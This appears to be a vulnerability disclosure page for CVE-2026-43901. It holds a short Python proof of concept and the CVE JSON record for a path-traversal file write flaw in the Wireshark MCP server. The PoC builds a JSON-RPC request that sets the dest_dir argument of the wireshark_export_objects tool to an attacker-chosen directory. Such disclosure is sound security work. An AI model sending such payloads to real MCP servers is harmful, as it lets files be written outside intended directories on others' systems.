CVE-2026-43901

import json """ Conceptual Proof of Concept (PoC) for CVE-2026-43901 This script demonstrates how a malicious actor could craft an MCP request to exploit the arbitrary file write vulnerability in Wireshark MCP <= 1.1.5. """ def create_malicious_mcp_request(pcap_path, malicious_destination): """ Constructs a JSON-RPC request for the wireshark_export_objects tool. Args: pcap_path (str): Path to a valid pcap file on the server or accessible by the server. malicious_destination (str): The arbitrary directory path where the attacker wants to write files. e.g., '../../../tmp/' or 'C:\Windows\Temp' """ # The tool name vulnerable in CVE-2026-43901 tool_name = "wireshark_export_objects" # Arguments passed to the tool # 'dest_dir' is the vulnerable parameter arguments = { "pcap_file": pcap_path, "dest_dir": malicious_destination, "protocol": "http" # specific protocol to export, e.g., http, smb, etc. } # Standard MCP (Model Context Protocol) JSON-RPC structure payload = { "jsonrpc": "2.0", "method": "tools/call", "params": { "name": tool_name, "arguments": arguments }, "id": 1 } return json.dumps(payload, indent=2) if __name__ == "__main__": # Example Scenario: # An attacker wants to write exported objects to a sensitive directory. # Note: In a real attack, the attacker would need a way to trigger the MCP client # to send this request to the server. target_pcap = "/var/log/capture.pcap" # Using absolute path or traversal to write outside intended sandbox attack_dir = "/tmp/pwned/" exploit_request = create_malicious_mcp_request(target_pcap, attack_dir) print("Generated Malicious MCP Request Payload:") print(exploit_request) print("\n[!] If the server processes this, files will be written to:", attack_dir)

{"cve": {"id": "CVE-2026-43901", "sourceIdentifier": "[email protected]", "published": "2026-05-11T23:20:21.697", "lastModified": "2026-05-11T23:20:21.697", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Wireshark MCP is an MCP Server that turns tshark into a structured analysis interface, then layers in optional Wireshark suite utilities. In 1.1.5 and earlier, wireshark-mcp exposes a wireshark_export_objects MCP tool that accepts an attacker-controlled dest_dir parameter and passes it to tshark's --export-objects flag with no mandatory path restriction. The path sandbox (_allowed_dirs) is None by default and only activates when the environment variable WIRESHARK_MCP_ALLOWED_DIRS is explicitly set. In a default installation, any directory on the filesystem can be used as the export destination."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://github.com/bx33661/Wireshark-MCP/security/advisories/GHSA-3r68-x3xc-rxpg", "source": "[email protected]"}]}}